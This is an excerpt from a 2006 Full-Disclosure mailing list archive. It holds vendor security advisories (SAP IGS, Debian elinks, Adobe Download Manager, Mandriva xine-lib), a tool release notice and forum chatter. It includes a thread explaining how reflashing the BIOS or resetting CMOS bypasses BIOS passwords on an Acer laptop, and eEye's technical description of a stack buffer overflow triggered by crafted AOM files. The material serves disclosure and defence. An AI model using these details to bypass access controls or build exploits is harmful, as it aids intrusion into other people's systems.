Research Team. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From ninjadaito at hushmail.com Tue Dec 5 02:22:15 2006 From: ninjadaito at hushmail.com (ninjadaito at hushmail.com) Date: Tue, 05 Dec 2006 13:22:15 +1100 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: <20061205022216.C3E4DDA824@mailserver7.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Bah!! Al-Qaeda this, Al-Qaeda that, links to Al-Qaeda - pfffffft! Seems that Al-Qaeda is as much under everybody's bed as Joseph McCarthy's communists once were. Whenever anything remotely whiffy happens, Al-Qaeda is behind it. If your peanuts are all eaten or your beer is flat, it's the devious work of shadowy Al-Qaeda. The odd thing is that most everybody knows it for what it is. Except of course for poor 'ole George W. Bush and his blind followers - living in complete denial of reality. So, when the *real* wolf happens along - who will be listening? Nobody! Speaking of the wolf - I wouldn't want to be holding too many US dollars anyway - seems the arse is going to fall out of it - we just don't know when. Buy Gold!! Later... Love, Ninja. All flames automatically redirected to the bit-bucket. On Tue, 05 Dec 2006 00:26:21 +1100 TheGesus wrote: >On 12/3/06, Dave No, not that one Korn > wrote: >> TheGesus wrote: >> >> > More and more people are hearing the recommendation to >"withdraw a >> > little extra cash out of the banks" to prepare for cyber >attacks. If >> > as many as 1.32% of bank depositors take their advice and >withdraw all >> > their money, the banks will close their doors. >> > >> > Al Qaeda threatens to disrupt the electronic bank payments >system. >> >> And YOU'RE MAKING IT HAPPEN! DUH! >> >> > This system contributes about 90% of the US money supply. >Without it, >> > 10% of the money supply (the cash & coin) must take over the >work of >> > the other 90%. >> > >> > Conclusion: Withdraw and stockpile some cash now. Shoot for at >least >> > three months' cash requirements. Don't wait. Start now. >> >> AQ don't intend to "attack the banking system". They plan to >get >> paranoids, suckers, and conspiracy-theorists like you to do >their dirty work >> for them. They just need to spread a rumour and then sit back >and watch as >> all you "loyal patriots" trash your own country out of fear and >cowardice. >> >> ObTopic: Sounds like a social engineering attack to me; >attempting to >> manipulate the users of a service into acting as an implicit >ddos against >> it. >> >> cheers, >> DaveK >> -- >> Can't think of a witty .sigline today.... >> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >I was only quoting (with a little creative editing) the late(?), >great(?) Paul Milne of Y2K disaster fame. > >There's a goldmine in there... > >http://groups.google.com/groups/search?lr=&safe=off&num=10&q=bank+p >anic+author%3Apaul+milne&safe=off&qt_s=Search > >"If you live within 5 miles of a 7-11, you're toast" > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wkYEARECAAYFAkV019UACgkQtM6vtsm2y1ux2QCfep9hzHtzQ4nxTcw2Dj6v0hhQ6KkA nAwJyPlpm7lRaY8RlGJsW8TJgDVR =sMcz -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 From jabra at ccs.neu.edu Tue Dec 5 04:17:43 2006 From: jabra at ccs.neu.edu (Joshua D. Abraham) Date: Mon, 4 Dec 2006 23:17:43 -0500 Subject: [Full-disclosure] PBNJ 2.04 - a suite of tools to monitor changes on a network over time. Message-ID: <20061205041743.GG3958@utopia.ccs.neu.edu> Hey, I just wanted to announce that PBNJ 2.04 was released. There were various updates to the documentation as well as removing the need to pass -s/--scan when performing a scan. PBNJ is a network suite to monitor changes that occur on a network over time. It does this by checking for changes on the target machine(s), which includes the details about the services running on them as well as the service state. PBNJ parses the data from a scan and stores it in a database. PBNJ uses Nmap to perform scans. http://prdownloads.sourceforge.net/pbnj/pbnj-2.04.tar.gz?download http://prdownloads.sourceforge.net/pbnj/pbnj-2.04.tar.bz2?download http://prdownloads.sourceforge.net/pbnj/pbnj-2.04.zip?download Documentation can be found here: http://pbnj.sourceforge.net/man.html PBNJ is also packaged for Debian, Gentoo and FreeBSD. Let me know if you have any questions, comments or suggestions. Regards, Josh -- Joshua D. Abraham Northeastern University College of Computer and Information Science www.ccs.neu.edu/home/jabra From mnunez at cybsec.com Tue Dec 5 18:26:00 2006 From: mnunez at cybsec.com (=?ISO-8859-1?Q?Mariano_Nu=F1ez_Di_Croce?=) Date: Tue, 05 Dec 2006 15:26:00 -0300 Subject: [Full-disclosure] CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Undocumented Features Message-ID: <4575B9B8.4010104@cybsec.com> (The following pre-advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf ) CYBSEC S.A. www.cybsec.com Pre-Advisory Name: SAP Internet Graphics Service (IGS) Undocumented Features ================== Vulnerability Class: Undocumented Features ==================== Release Date: 12/05/2006 ============= Affected Applications: ====================== * SAP IGS 6.40 Patchlevel <= 15 * SAP IGS 7.00 Patchlevel <= 3 Affected Platforms: =================== * AIX 64 bits * HP-UX on IA64 64bit * HP-UX on PA-RISC 64bit * Linux on IA32 32bit * Linux on IA64 64bit * Linux on Power 64bit * Linux on x86_64 64bit * Linux on zSeries 64bit * OS/400 V5R2M0 * Solaris on SPARC 64bit * TRU64 64bit * Windows Server on IA32 32bit * Windows Server on IA64 64bit * Windows Server on x64 64bit Local / Remote: Remote =============== Severity: Medium ========= Author: Mariano Nu?ez Di Croce ======= Vendor Status: ============== * Confirmed, update released. Reference to Vulnerability Disclosure Policy: ============================================= http://www.cybsec.com/vulnerability_policy.pdf Product Overview: ================== "The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output." It is important to note that IGS is installed and activated by default with the Web Application Server (versions >= 6.30) Vulnerability Description: ========================== Undocumented features have been discovered in SAP IGS service, some of which may signify security risks. Technical Details: ================== Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their customers to upgrade affected software prior to technical knowledge been publicly available. Impact: ======= Successful exploitation of this vulnerability allows to remotely shutdown SAP IGS service, access configuration files and to perform unauthorized actions over service deployment. Solutions: ========== SAP has released patches that disable the default-enabled access to the service HTTP interface. Beside, some commands has been disabled. Affected customers should apply the patches immediately. More information can be found on SAP Notes 959358 and 965201. Vendor Response: ================ * 06/02/2006: Initial Vendor Contact. * 06/09/2006: Vendor Confirmed Vulnerability. * 07/03/2006: Vendor Releases Update for version 6.40. * 07/13/2006: Vendor Releases Update for version 7.00. * 10/08/2006: Vendor Confirmed Solution. * 12/05/2006: Pre-Advisory Public Disclosure. Special Thanks: =============== Thanks goes to Carlos Diaz and Victor Montero. Contact Information: ==================== For more information regarding the vulnerability feel free to contact the author at mnunez {at} cybsec.com. Please bear in mind that technical details will be disclosed to the general public three months after the release of this pre-advisory. For more information regarding CYBSEC: www.cybsec.com (c) 2006 - CYBSEC S.A. Security Systems From mnunez at cybsec.com Tue Dec 5 18:32:45 2006 From: mnunez at cybsec.com (=?ISO-8859-1?Q?Mariano_Nu=F1ez_Di_Croce?=) Date: Tue, 05 Dec 2006 15:32:45 -0300 Subject: [Full-disclosure] CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Remote Arbitrary File Removal Message-ID: <4575BB4D.30507@cybsec.com> (The following pre-advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Arbitrary_File_Removal.pdf ) CYBSEC S.A. www.cybsec.com Pre-Advisory Name: SAP Internet Graphics Service (IGS) Remote Arbitrary File Removal ================== Vulnerability Class: Path Traversal ==================== Release Date: 12/05/2006 ============= Affected Applications: ====================== * SAP IGS 6.40 Patchlevel <= 16 * SAP IGS 7.00 Patchlevel <= 6 Affected Platforms: =================== * AIX 64 bits * HP-UX on IA64 64bit * HP-UX on PA-RISC 64bit * Linux on IA32 32bit * Linux on IA64 64bit * Linux on Power 64bit * Linux on x86_64 64bit * Linux on zSeries 64bit * OS/400 V5R2M0 * Solaris on SPARC 64bit * TRU64 64bit * Windows Server on IA32 32bit * Windows Server on IA64 64bit * Windows Server on x64 64bit Local / Remote: Remote =============== Severity: High ========= Author: Mariano Nu?ez Di Croce ======= Vendor Status: ============== * Confirmed, update released. Reference to Vulnerability Disclosure Policy: ============================================= http://www.cybsec.com/vulnerability_policy.pdf Product Overview: ================== "The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output." It is important to note that IGS is installed and activated by default with the Web Application Server (versions >= 6.30) Vulnerability Description: ========================== A specially crafted HTTP request can remove any file located in SAP IGS file-system. Technical Details: ================== Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their customers to upgrade affected software prior to technical knowledge been publicly available. Impact: ======= Under UNIX systems, successful exploitation of this vulnerability may allow an attacker to remotely remove files existing on the SAP IGS file-system. These files must have write permission for SAP System Administrator account (adm). Under Microsoft Windows systems, successful exploitation of this vulnerability may allow an attacker to remove any files existing on the SAP IGS file-system. Solutions: ========== SAP has released patches to address this vulnerability. Affected customers should apply the patches immediately. Vendor Response: ================ * 11/03/2006: Initial Vendor Contact. * 11/06/2006: Vendor Confirmed Vulnerability. * 11/29/2006: Vendor Releases Update for version 6.40. * 11/29/2006: Vendor Releases Update for version 7.00. * 12/05/2006: Pre-Advisory Public Disclosure. Special Thanks: =============== Thanks goes to Carlos Diaz and Victor Montero. Contact Information: ==================== For more information regarding the vulnerability feel free to contact the author at mnunez {at} cybsec.com. Please bear in mind that technical details will be disclosed to the general public three months after the release of this pre-advisory. For more information regarding CYBSEC: www.cybsec.com (c) 2006 - CYBSEC S.A. Security Systems From jmm at debian.org Tue Dec 5 19:50:15 2006 From: jmm at debian.org (Moritz Muehlenhoff) Date: Tue, 5 Dec 2006 20:50:15 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1228-1] New elinks packages fix arbitrary shell command execution Message-ID: <20061205195015.GA3531@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1228-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff December 5th, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : elinks Vulnerability : insufficient escaping Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-5925 Debian Bug : 399188 Teemu Salmela discovered that the elinks character mode web browser performs insufficient sanitising of smb:// URIs, which might lead to the execution of arbitrary shell commands. For the stable distribution (sarge) this problem has been fixed in version 0.10.4-7.1. For the upcoming stable distribution (etch) this problem has been fixed in version 0.11.1-1.2. For the unstable distribution (sid) this problem has been fixed in version 0.11.1-1.2. We recommend that you upgrade your elinks package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1.dsc Size/MD5 checksum: 855 f57923819fa4fce0caca333fb49a08cb http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1.diff.gz Size/MD5 checksum: 25157 611bbe8d6abbdec32944915213b3ffea http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4.orig.tar.gz Size/MD5 checksum: 3533243 d97d1755f9553a3f5c68a3fe420c6a7c Alpha architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_alpha.deb Size/MD5 checksum: 1439074 2db129d65122955bd31c6a62700f0843 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_alpha.deb Size/MD5 checksum: 764102 0654e01c0d5ee49ddb8d24e01d4bd220 AMD64 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_amd64.deb Size/MD5 checksum: 1364322 aa61b139f250715d1e9cb1725bfa7938 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_amd64.deb Size/MD5 checksum: 706090 18b9ebad31887943c0f54aebd0b355d6 ARM architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_arm.deb Size/MD5 checksum: 1314146 21885ec226e0eef970c24d0bda2c087c http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_arm.deb Size/MD5 checksum: 664026 f7c2193f6a4a68a090aabafdb7297d1b HP Precision architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_hppa.deb Size/MD5 checksum: 1376592 3cda3866a1e2fcf13e702e789ed075df http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_hppa.deb Size/MD5 checksum: 714314 9e491abd147dc046a3702269d9cd0d1b Intel IA-32 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_i386.deb Size/MD5 checksum: 1325060 0c438d6afad2fbd82f37fb2a92d2e109 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_i386.deb Size/MD5 checksum: 671640 d448bedeaefc0de24d256a862401da14 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_ia64.deb Size/MD5 checksum: 1536618 c68927923c69e4d51e35df3bbca94736 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_ia64.deb Size/MD5 checksum: 838730 9b10a09bb38f156ab2392774e123ca34 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_m68k.deb Size/MD5 checksum: 1282356 ce4945f7b57906ee710bc0fb1fc23d04 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_m68k.deb Size/MD5 checksum: 639332 7e01f8968d3d7c3539164bcd5ddfe390 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_mips.deb Size/MD5 checksum: 1368274 72ad629b2802e1027517694a38c923e2 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_mips.deb Size/MD5 checksum: 711436 8fc708e7101e00c668ba06247f851012 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_mipsel.deb Size/MD5 checksum: 1365494 de193ce83bc57ee5544410d306d563c4 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_mipsel.deb Size/MD5 checksum: 709948 5f8a7bfba56f7c99f2318f7cb4bde8bb PowerPC architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_powerpc.deb Size/MD5 checksum: 1351744 9fb15425d622021fc9d5aeb23a70077d http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_powerpc.deb Size/MD5 checksum: 692324 dc7a80d14cd4ec9b9f0ad66a0ff4d9ec IBM S/390 architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_s390.deb Size/MD5 checksum: 1358028 f2d57e3e90678e07239b24c76462e3e4 http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_s390.deb Size/MD5 checksum: 707938 488e81b960f0cb8521e59d043039e6df Sun Sparc architecture: http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_sparc.deb Size/MD5 checksum: 1328470 f1430b94811c29d5e05ec9166d73884b http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_sparc.deb Size/MD5 checksum: 672116 5db368ec717809649fe9c6cc590a0eb6 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFdc08Xm3vHE4uyloRAoUmAKDaOFDdifh/9nrTFYmRXaCr9+ie4gCeLjq4 fc+oAyFB3mszcICsAkhE/gs= =6hci -----END PGP SIGNATURE----- From digital.richard at gmail.com Tue Dec 5 17:24:21 2006 From: digital.richard at gmail.com (richard cassidy) Date: Tue, 5 Dec 2006 12:24:21 -0500 Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi Message-ID: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is "updated'". https://www.synapsenow.com/synapse/data/7117/documents/AS31-51-5110_Flash_v200.zip If you forget the bios password, they require the computer to be mailed to them; then they charge $100USD (citing labor & security). The work around they don't tell you about is to download the bios flasher and update your bios. I tried contacting Acer about this bug and could not reach (was not transfered) the proper people; I've had teeth pulled that went better than trying to inform Acer. From tyoptyop at gmail.com Tue Dec 5 21:37:36 2006 From: tyoptyop at gmail.com (Tyop?) Date: Tue, 5 Dec 2006 22:37:36 +0100 Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi In-Reply-To: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> References: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> Message-ID: <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com> On 12/5/06, richard cassidy wrote: > Flashing the bios on Acer Aspire 5102WLMi will erase all passwords > previously set. This is obviously a bug! All passwords should not be > wiped out with a bios flash (or at least they weren't on a Dell). Or, > if they are, it should be stated up front so the passwords can be set > again once the bios is "updated'". Flashing the bios will erase all data. It's a feature, not a bug. -- Tyop? From Valdis.Kletnieks at vt.edu Tue Dec 5 21:53:42 2006 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 05 Dec 2006 16:53:42 -0500 Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi In-Reply-To: Your message of "Tue, 05 Dec 2006 22:37:36 +0100." <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com> References: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com> Message-ID: <200612052153.kB5LrgTK002943@turing-police.cc.vt.edu> On Tue, 05 Dec 2006 22:37:36 +0100, Tyop? said: > On 12/5/06, richard cassidy wrote: > > Flashing the bios on Acer Aspire 5102WLMi will erase all passwords > > previously set. This is obviously a bug! All passwords should not be > > wiped out with a bios flash (or at least they weren't on a Dell). Or, > > if they are, it should be stated up front so the passwords can be set > > again once the bios is "updated'". > > Flashing the bios will erase all data. So the big question becomes - on an Acer, are the passwords stored in the BIOS flash memory (in which case, having them evaporate on a BIOS flas is reasonable), or are they on the NVRAM chip, in which case it's a bug/misfeature? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061205/37c8b2e0/attachment.bin From endrazine at gmail.com Tue Dec 5 22:49:44 2006 From: endrazine at gmail.com (endrazine) Date: Tue, 05 Dec 2006 23:49:44 +0100 Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi In-Reply-To: <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com> References: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com> Message-ID: <4575F788.6050809@gmail.com> Tyop? a ?crit : > Flashing the bios will erase all data. > It's a feature, not a bug. > > Bios passwords are stored on the CMOS, not the Rom itself, so no, it doesn't have to be. On the other side, if you can flash your ROM, you have iopl(3) hence root privileges or at least enougth privileges to get those passwors back (1). So that's really no bid deal. Regards, endrazine- (1) http://packetstorm.linuxsecurity.com/papers/password/Bios.Information.Leakage.txt side note: I think you both know nothing. Sadly, giving non technical _opinions_ has become the main source of postings on this list. From endrazine at gmail.com Tue Dec 5 23:02:10 2006 From: endrazine at gmail.com (endrazine) Date: Wed, 06 Dec 2006 00:02:10 +0100 Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi In-Reply-To: <4575F788.6050809@gmail.com> References: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com> <4575F788.6050809@gmail.com> Message-ID: <4575FA72.7010703@gmail.com> endrazine a ?crit : Just so you know : most Bios settings are stored on the Cmos, so if you can flash the Rom, you have ioperms at the very least on Cmos i/o ports, so you can reset the whole Cmos anyway. endrazine- From Advisories at eeye.com Wed Dec 6 01:28:36 2006 From: Advisories at eeye.com (eEye Advisories) Date: Tue, 5 Dec 2006 17:28:36 -0800 Subject: [Full-disclosure] EEYE: Adobe Download Manager AOM Stack Buffer Overflow Vulnerability Message-ID: eEye Research - http://research.eeye.com Adobe Download Manager AOM Stack Buffer Overflow Vulnerability Release Date: December 5, 2006 Date Reported: November 10, 2006 Severity: High (Code Execution) Systems Affected: Adobe Download Manager 2.1.x and earlier Overview: eEye Digital Security has discovered a stack buffer overflow in Adobe Download Manager, a utility typically installed for the purpose of downloading Adobe software such as Adobe (Acrobat) Reader. By opening a malicious AOM file, a user's system may be compromised by arbitrary code within the file, which executes with the privileges of that user. A web-based attack conducted through Internet Explorer may succeed without the use of ActiveX or scripting, and without any additional user interaction other than viewing a web page, if the web server indicates a Content-Type of "application/aom" when serving up the malicious AOM file. In such a case, an ".aom" file extension is not required. Technical Details: AdobeDownloadManager.exe is responsible for extracting download instructions from AOM files, which are essentially XML with an appended CRC32 in decimal, and committing the instructions to the file "%APPDATA%\dm.ini" for later processing. For instance, opening the following AOM file: WelcomeToMyHumbleAdobe 3871966612 Will generate the following lines in "dm.ini": [STARTUP] Status=IncompleteDownload [WelcomeToMyHumbleAdobe] StoreID=0 TransactionID=0 When launched, whether or not it is supplied with an AOM file, AdobeDownloadManager.exe reads the entries from "dm.ini" and handles each described download according to its properties. It begins by reading a list of section names into a 400h-byte buffer using GetPrivateProfileStringA, then copies each section name into a 108h-byte stack buffer using strncpy with a length limit equal to the length of the section name string. The result is a relatively straightforward stack buffer overflow, with the only complication being the character restrictions. It should be possible to uninstall Adobe Download Manager, or at least unassociate the AOM file extension and "application/aom" Content-Type in the registry, to defend against this vulnerability. Hopefully users who have been forced to install Adobe Download Manager realized its superfluousness and have already uninstalled it. Protection: Retina - Network Security Scanner has been updated to identify this vulnerability. Blink - Unified Client Security has proactively protected from this vulnerability since its discovery. Vendor Status: Adobe has released a patch for this vulnerability which is available at http://www.adobe.com/products/acrobat/acrrmanager.html. The vendor bulletin is available at: http://www.adobe.com/support/security/bulletins/apsb06-19.html. Credit: Derek Soeder Related Links: Retina - Network Security Scanner - Free Trial: http://www.eeye.com/html/products/retina/download/index.html Blink - Unified Client Security Personal - Free For Home Use: http://www.eeye.com/html/products/blink/personal/download/index.html Blink - Unified Client Security Professional - Free Trial: http://www.eeye.com/html/products/blink/download/index.html Greetings: Spooky action at a distance. Whoever else found that kernel race condition. Runner-up: Automatically Downloads Malware. (Thanks Daniel!) Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert at eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. From security at mandriva.com Wed Dec 6 02:42:00 2006 From: security at mandriva.com (security at mandriva.com) Date: Tue, 5 Dec 2006 19:42:00 -0700 Subject: [Full-disclosure] [ MDKSA-2006:224 ] - Updated xine-lib packages fix buffer overflow vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:224 http://www.mandriva.com/security/ _______________________________________________________________________ Package : xine-lib Date : December 5, 2006 Affected: 2007.0, Corporate 3.0 _______________________________________________________________________ Problem Description: Buffer overflow in the asmrp_eval function for the Real Media input plugin allows remote attackers to cause a denial of service and possibly execute arbitrary code via a rulebook with a large number of rulematches. Updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: b0aa36d10d1ee53184b345c4a48b6fcb 2007.0/i586/libxine1-1.1.2-3.2mdv2007.0.i586.rpm 0c67ca2d47ea5594d2978573205c158f 2007.0/i586/libxine1-devel-1.1.2-3.2mdv2007.0.i586.rpm ee79849493b4b40f207e0e135dc9f4ca 2007.0/i586/xine-aa-1.1.2-3.2mdv2007.0.i586.rpm f0d942949cf3938287e3f4ec44275807 2007.0/i586/xine-arts-1.1.2-3.2mdv2007.0.i586.rpm db80c09dc6050a920aeae2e410ab4471 2007.0/i586/xine-dxr3-1.1.2-3.2mdv2007.0.i586.rpm 79f07b0afcbf4682752919829bde6fcf 2007.0/i586/xine-esd-1.1.2-3.2mdv2007.0.i586.rpm 51688356ab263c95b051712ed0f70def 2007.0/i586/xine-flac-1.1.2-3.2mdv2007.0.i586.rpm 74cd9a178d86754b337e4b1217874863 2007.0/i586/xine-gnomevfs-1.1.2-3.2mdv2007.0.i586.rpm 3f331ce5c5463512038ad69a785c9dbe 2007.0/i586/xine-image-1.1.2-3.2mdv2007.0.i586.rpm f147438cd7f07aaf70e1178bd2343133 2007.0/i586/xine-plugins-1.1.2-3.2mdv2007.0.i586.rpm 7cb84dbcf336d715b04812fbedb349cf 2007.0/i586/xine-sdl-1.1.2-3.2mdv2007.0.i586.rpm 860fe1ca635d076e9bfa1819e7b603cd 2007.0/i586/xine-smb-1.1.2-3.2mdv2007.0.i586.rpm c7a995ee090abd62b6a580b53e3c3364 2007.0/SRPMS/xine-lib-1.1.2-3.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: a1a3e704ff2f356784ad084f95d41f74 2007.0/x86_64/lib64xine1-1.1.2-3.2mdv2007.0.x86_64.rpm ee81c8526e7baf295f214338fa3d45cd 2007.0/x86_64/lib64xine1-devel-1.1.2-3.2mdv2007.0.x86_64.rpm bdb0a918df1d9239016741bde0027f3a 2007.0/x86_64/xine-aa-1.1.2-3.2mdv2007.0.x86_64.rpm 6cc4cc4b46b3dbeb22364ecc15d9c7d6 2007.0/x86_64/xine-arts-1.1.2-3.2mdv2007.0.x86_64.rpm 4d9ce5c5ef2814e2c18dcc60e6270322 2007.0/x86_64/xine-dxr3-1.1.2-3.2mdv2007.0.x86_64.rpm 38fe8e37988df8307028778421029349 2007.0/x86_64/xine-esd-1.1.2-3.2mdv2007.0.x86_64.rpm 53ccedaeef04ff9b15bcf3d63cdb8663 2007.0/x86_64/xine-flac-1.1.2-3.2mdv2007.0.x86_64.rpm b090fb7ac33b25d310dc8cfc4758062b 2007.0/x86_64/xine-gnomevfs-1.1.2-3.2mdv2007.0.x86_64.rpm 51d280def3f6c87276e9b4892c807d38 2007.0/x86_64/xine-image-1.1.2-3.2mdv2007.0.x86_64.rpm fdbfa62329ac6fadba0277db33b71cff 2007.0/x86_64/xine-plugins-1.1.2-3.2mdv2007.0.x86_64.rpm af8dda72b12c9a36d7a51d3d5916bb38 2007.0/x86_64/xine-sdl-1.1.2-3.2mdv2007.0.x86_64.rpm dea73578f285ebe1b1aac769cc0a549a 2007.0/x86_64/xine-smb-1.1.2-3.2mdv2007.0.x86_64.rpm c7a995ee090abd62b6a580b53e3c3364 2007.0/SRPMS/xine-lib-1.1.2-3.2mdv2007.0.src.rpm Corporate 3.0: e27a1f3f0a92a65ea9673d0aa7bd9660 corporate/3.0/i586/libxine1-1-0.rc3.6.14.C30mdk.i586.rpm cef9a906baabe8c8e18bbe45762268fd corporate/3.0/i586/libxine1-devel-1-0.rc3.6.14.C30mdk.i586.rpm 5260c623ea029663a3166c8e350b6306 corporate/3.0/i586/xine-aa-1-0.rc3.6.14.C30mdk.i586.rpm aa8ed9640d1e42608f1cd531d4d00dd6 corporate/3.0/i586/xine-arts-1-0.rc3.6.14.C30mdk.i586.rpm 1d311b51dc2ea55a1590ef409bfd9d9f corporate/3.0/i586/xine-dxr3-1-0.rc3.6.14.C30mdk.i586.rpm d8602b10e1b5b0ea29959c981bf5866e corporate/3.0/i586/xine-esd-1-0.rc3.6.14.C30mdk.i586.rpm ba65fc2fa69c85b848f7fe5728381003 corporate/3.0/i586/xine-flac-1-0.rc3.6.14.C30mdk.i586.rpm bbf13c446ebf132b6a474a9bf4a300cd 